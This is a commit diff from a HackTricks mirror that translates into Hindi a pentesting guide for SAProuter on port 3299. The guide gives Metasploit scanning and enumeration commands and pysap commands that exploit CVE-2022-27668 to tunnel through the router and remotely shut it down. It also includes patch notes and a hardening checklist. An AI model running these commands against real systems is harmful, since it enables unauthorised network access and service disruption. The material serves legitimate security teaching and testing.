maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/3299-pentesting-saprouter.m

Browse Source
This commit is contained in:
Translator 2025-08-14 06:16:02 +00:00
parent 2229ffcd15
commit 5b503c4c03
1 changed files with 70 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

77
src/network-services-pentesting/3299-pentesting-saprouter.md
View File

@ -1,9 +1,11 @@
# # 3299/tcp - Pentesting SAProuter
{{#include ../banners/hacktricks-training.md}}
```text
PORT STATE SERVICE VERSION
3299/tcp open saprouter?
```
यह [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/) से पोस्ट का सारांश है
यह [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/) से पोस्ट का सारांश है
## Metasploit के साथ SAProuter पैठ की समझ
@ -11,13 +13,13 @@ SAProuter SAP सिस्टम के लिए एक रिवर्स प
**स्कैनिंग और जानकारी एकत्र करना**
शुरुआत में, यह पहचानने के लिए एक स्कैन किया जाता है कि क्या दिए गए IP पर एक SAP राउटर चल रहा है, **sap_service_discovery** मॉड्यूल का उपयोग करके। यह कदम SAP राउटर की उपस्थिति और इसके खुले पोर्ट की स्थापना के लिए महत्वपूर्ण है।
शुरुआत में, यह पहचानने के लिए एक स्कैन किया जाता है कि क्या दिए गए IP पर SAP राउटर चल रहा है, **sap_service_discovery** मॉड्यूल का उपयोग करके। यह कदम SAP राउटर की उपस्थिति और इसके खुले पोर्ट की स्थापना के लिए महत्वपूर्ण है।
```text
msf> use auxiliary/scanner/sap/sap_service_discovery
msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
msf auxiliary(sap_service_discovery) > run
```
खोज के बाद, **sap_router_info_request** मॉड्यूल के साथ SAP राउटर की कॉन्फ़िगरेशन में आगे की जांच की जाती है ताकि आंतरिक नेटवर्क विवरण को संभावित रूप से प्रकट किया जा सके।
खोज के बाद, **sap_router_info_request** मॉड्यूल के साथ SAP राउटर की कॉन्फ़िगरेशन में आगे की जांच की जाती है ताकि आंतरिक नेटवर्क विवरण को संभावित रूप से उजागर किया जा सके।
```text
msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request
msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
@ -34,14 +36,14 @@ msf auxiliary(sap_router_portscanner) > set PORTS 32NN
**उन्नत एन्यूमरेशन और ACL मैपिंग**
अधिक स्कैनिंग यह प्रकट कर सकती है कि SAProuter पर एक्सेस कंट्रोल सूचियाँ (ACLs) कैसे कॉन्फ़िगर की गई हैं, यह बताते हुए कि कौन सी कनेक्शन अनुमत या अवरुद्ध हैं। यह जानकारी सुरक्षा नीतियों और संभावित कमजोरियों को समझने में महत्वपूर्ण है।
अधिक स्कैनिंग यह प्रकट कर सकती है कि SAProuter पर एक्सेस कंट्रोल सूचियाँ (ACLs) कैसे कॉन्फ़िगर की गई हैं, यह विवरण देते हुए कि कौन सी कनेक्शन अनुमत या अवरुद्ध हैं। यह जानकारी सुरक्षा नीतियों और संभावित कमजोरियों को समझने में महत्वपूर्ण है।
```text
msf auxiliary(sap_router_portscanner) > set MODE TCP
msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
```
**आंतरिक होस्टों की अंधी गणना**
**आंतरिक होस्ट की ब्लाइंड एन्यूमरेशन**
उन परिदृश्यों में जहां SAProuter से सीधे जानकारी सीमित है, अंधी गणना जैसी तकनीकों का उपयोग किया जा सकता है। यह दृष्टिकोण आंतरिक होस्टनामों के अस्तित्व का अनुमान लगाने और सत्यापित करने का प्रयास करता है, सीधे IP पते के बिना संभावित लक्ष्यों को उजागर करता है।
उन परिदृश्यों में जहां SAProuter से सीधे जानकारी सीमित है, ब्लाइंड एन्यूमरेशन जैसी तकनीकों का उपयोग किया जा सकता है। यह दृष्टिकोण आंतरिक होस्टनामों के अस्तित्व का अनुमान लगाने और सत्यापित करने का प्रयास करता है, संभावित लक्ष्यों को सीधे IP पते के बिना प्रकट करता है।
**पेनिट्रेशन टेस्टिंग के लिए जानकारी का लाभ उठाना**
@ -53,13 +55,74 @@ msf auxiliary(sap_hostctrl_getcomputersystem) > run
```
**निष्कर्ष**
यह दृष्टिकोण सुरक्षित SAProuter कॉन्फ़िगरेशन के महत्व को रेखांकित करता है और लक्षित पेनट्रेशन टेस्टिंग के माध्यम से आंतरिक नेटवर्क तक पहुँचने की संभावनाओं को उजागर करता है। SAP राउटर्स को सही तरीके से सुरक्षित करना और नेटवर्क सुरक्षा आर्किटेक्चर में उनकी भूमिका को समझना अनधिकृत पहुँच के खिलाफ सुरक्षा के लिए महत्वपूर्ण है।
यह दृष्टिकोण सुरक्षित SAProuter कॉन्फ़िगरेशन के महत्व को रेखांकित करता है और लक्षित पेनटेस्टिंग के माध्यम से आंतरिक नेटवर्क तक पहुँचने की संभावनाओं को उजागर करता है। SAP राउटर को सही तरीके से सुरक्षित करना और नेटवर्क सुरक्षा आर्किटेक्चर में उनकी भूमिका को समझना अनधिकृत पहुँच के खिलाफ सुरक्षा के लिए महत्वपूर्ण है।
Metasploit मॉड्यूल और उनके उपयोग के बारे में अधिक विस्तृत जानकारी के लिए, [Rapid7's database](http://www.rapid7.com/db) पर जाएं।
---
## हाल की कमजोरियाँ (2022-2025)
### CVE-2022-27668 अनुचित पहुँच नियंत्रण ➜ दूरस्थ प्रशासनिक कमांड निष्पादन
जून 2022 में SAP ने सुरक्षा नोट **3158375** जारी किया, जो SAProuter (सभी कर्नेल ≥ 7.22) में एक महत्वपूर्ण दोष (CVSS 9.8) को संबोधित करता है। एक अनधिकृत हमलावर अनुमति देने वाले `saprouttab` प्रविष्टियों का दुरुपयोग करके **प्रशासनिक पैकेट** (जैसे *shutdown*, *trace-level*, *connection-kill*) को दूरस्थ होस्ट से भेज सकता है, भले ही राउटर को `-X` दूरस्थ-प्रशासन विकल्प के बिना शुरू किया गया हो।
यह समस्या इस संभावना के कारण उत्पन्न होती है कि राउटर के अपने लूपबैक इंटरफेस के लिए एक सुरंग बनाई जा सकती है, जो निर्दिष्ट पते **0.0.0.0** को लक्षित करती है। एक बार सुरंग स्थापित हो जाने पर, हमलावर स्थानीय-होस्ट विशेषाधिकार प्राप्त कर लेता है और कोई भी प्रशासनिक कमांड चला सकता है।
व्यावहारिक शोषण को **pysap** ढांचे के साथ पुन: उत्पन्न किया जा सकता है:
```bash
# 1. Build a loopback tunnel through the vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
-t 0.0.0.0 -r 3299 \
-a 127.0.0.1 -l 3299 -v
# 2. Send an admin packet (here: stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299
```
**प्रभावित संस्करण**
* स्टैंड-अलोन SAProuter 7.22 / 7.53
* कर्नेल 7.49, 7.77, 7.81, 7.857.88 (शामिल KRNL64NUC/UC)
**फिक्स / शमन**
1. SAP नोट **3158375** के साथ प्रदान किए गए पैच को लागू करें।
2. `saprouttab` में `P` और `S` लाइनों से वाइल्डकार्ड (`*`) लक्ष्यों को हटा दें।
3. सुनिश्चित करें कि राउटर **बिना** `-X` विकल्प के शुरू किया गया है और **प्रत्यक्ष** रूप से इंटरनेट के लिए उजागर नहीं है।
---
## अपडेटेड टूलिंग & ट्रिक्स
* **pysap** सक्रिय रूप से बनाए रखा जाता है और कस्टम NI/Router पैकेट बनाने, ACLs को फज़ करने या CVE-2022-27668 शोषण को स्वचालित करने के लिए `router_portfw.py`, `router_admin.py` & `router_trace.py` प्रदान करता है।
* **Nmap** कस्टम SAProuter प्रॉब जोड़कर सेवा पहचान का विस्तार करें:
```text
Probe TCP SAProuter q|\x00\x00\x00\x00|
ports 3299
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/
```
NSE स्क्रिप्टों के साथ या `--script=banner` के साथ मिलाकर बैनर स्ट्रिंग (`SAProuter <ver> on '<host>'`) लीक करने वाले संस्करणों की तेजी से पहचान करें।
* **Metasploit** ऊपर दिखाए गए सहायक मॉड्यूल pysap के साथ बनाए गए SOCKS या NI प्रॉक्सी के माध्यम से अभी भी काम करते हैं, जिससे पूर्ण फ्रेमवर्क एकीकरण सक्षम होता है जब राउटर प्रत्यक्ष पहुंच को ब्लॉक करता है।
---
## हार्डनिंग & डिटेक्शन चेकलिस्ट
* परिधीय फ़ायरवॉल पर पोर्ट **3299/TCP** को फ़िल्टर करें केवल विश्वसनीय SAP समर्थन नेटवर्क से ट्रैफ़िक की अनुमति दें।
* SAProuter को **पूर्ण रूप से पैच** रखें; `saprouter -v` के साथ सत्यापित करें और नवीनतम कर्नेल पैच स्तर की तुलना करें।
* `saprouttab` में **कठोर, होस्ट-विशिष्ट** प्रविष्टियों का उपयोग करें; `*` वाइल्डकार्ड से बचें और मनमाने होस्ट या पोर्ट को लक्षित करने वाले `P`/`S` नियमों को अस्वीकार करें।
* सेवा को **`-S <secudir>` + SNC** के साथ शुरू करें ताकि एन्क्रिप्शन और आपसी प्रमाणीकरण को लागू किया जा सके।
* दूरस्थ प्रशासन (`-X`) को अक्षम करें और, यदि संभव हो, तो आवश्यक ट्रैफ़िक के लिए बाहरी रिवर्स प्रॉक्सी का उपयोग करते हुए श्रोता को `127.0.0.1` पर बाइंड करें।
* संदिग्ध `ROUTER_ADM` पैकेट या `0.0.0.0` के लिए अप्रत्याशित `NI_ROUTE` अनुरोधों के लिए **dev_rout** लॉग की निगरानी करें।
---
## **संदर्भ**
- [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/)
- [https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/](https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/)
## Shodan